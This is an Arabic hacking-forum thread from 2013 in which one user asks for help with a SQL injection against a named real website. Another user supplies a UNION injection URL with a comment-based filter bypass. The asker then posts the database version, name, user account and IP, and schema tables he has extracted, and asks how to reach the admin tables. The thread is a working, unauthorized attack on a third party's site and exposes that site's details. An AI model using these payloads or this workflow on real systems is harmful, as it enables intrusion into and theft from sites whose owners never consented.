:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/forumdisplay.php?f=343)
-   -   أرجـــــوووووكم مـــساعدة :-( (http://www.vbspiders.com/vb/showthread.php?t=66432)

freedom_h@ck3r 01-02-2013 06:21 AM

أرجـــــوووووكم مـــساعدة :-(
 
:alla::alla::alla: تعبت من نفس المشكلة...

إخواني دئماً بتصيبني وأقف عاجز أمامها...
إنه بعد ما أستعلم عن عدد الأعمدة بحاول أطالع العمود المصاب...
بس بدل ما يطلع رقم العمود المصاب يطلعلي الخطأ...
هذا مثال حي....
وثغرة جديدة 100%

http://www.dracoders.com/games.php?id=7'

طيب بعد ال order+ by
عدد الأعمدة طلع 5

أنا جربت union+select
هيك يعني:

http://www.dracoders.com/games.php?i...ct+1,2,3,4,5--

بس المشكلة انه ما طلع العمود المصاب...طلعلي خطأ السكيول

ERROR [QUERY] : Query exec error:select * from cms_games where id=-7 union select 1,2,3,4,5/* mySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' at line 1 mySQL error code: 1064 Date: Wednesday 02nd 2013f January 2013 03:44:12 AM

شوفوا التاريخ...هذا اليوم...يعني الثغرة لسا جديدة وما تسكرت...

أرجـــــــــوووووووووووووووكم ساعدوني

:122::122:

ChucK NoRRis 01-02-2013 02:28 PM

رد: أرجـــــوووووكم مـــساعدة :-(
 
الموقع مسوي فلترة على امر union تقدر تتخطاه بتغييره الى
كود:

/!union*/
كود:

http://www.dracoders.com/games.php?id=-7+/*!union*/+select+1,2,3,4,5--

freedom_h@ck3r 01-02-2013 11:37 PM

رد: أرجـــــوووووكم مـــساعدة :-(
 
اقتباس:

المشاركة الأصلية كتبت بواسطة ChucK NoRRis (المشاركة 457209)
الموقع مسوي فلترة على امر union تقدر تتخطاه بتغييره الى
كود:

/!union*/
كود:

http://www.dracoders.com/games.php?id=-7+/*!union*/+select+1,2,3,4,5--

مــــــشكووووووور يا طـــيّب....شكراً للمساعدة:clap:

freedom_h@ck3r 01-03-2013 01:57 AM

رد: أرجـــــوووووكم مـــساعدة :-(
 
أخي الكريم...معلش تحملني شوي...
بعرف زودتها عليك...

على نفس الموقع,,
مشي الحال معي...بس وصلت لنقطة وبعدها ضعت...

طلعت اصدار قاعدة البيانات


5.0.92-enterprise-gpl-log

واسم القاعدة

Sql286973_5

واسم مستخدم القاعدة

Sql286973@62.149.131.163

بعدين طلعت الجداول الموجودة بالقاعدة الرئيسية...

بس ولا واحد منهم بدل على آدمن أو إدارة....إلخ



CHARACTER_SETS,CLIENT_STATISTICS,COLLATIONS,COLLAT ION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRI VILEGES,INNODB_BUFFER_POOL_CONTENT,INDEX_STATISTIC S,KEY_COLUMN_USAGE,PROCESSLIST,PROFILING,ROUTINES, SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE _CONSTRAINTS,TABLE_PRIVILEGES,TABLE_STATISTICS,TRI GGERS,USER_PRIVILEGES,USER_STATISTICS,VIE


ولله ضعت وماعاد عرفت شو ساوي بعدين..أرجوك بس ترشدني وتقلي شو الخطوات بعدين..أو شو لازم ساوي مع ذكر السبب اذا في مجال مشان أعرف شو عم ساوي...
وبكرر أسفي...بس بدنا نتعلم ;-)

ومـــــــشكووووور ســـلف


الساعة الآن 08:29 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0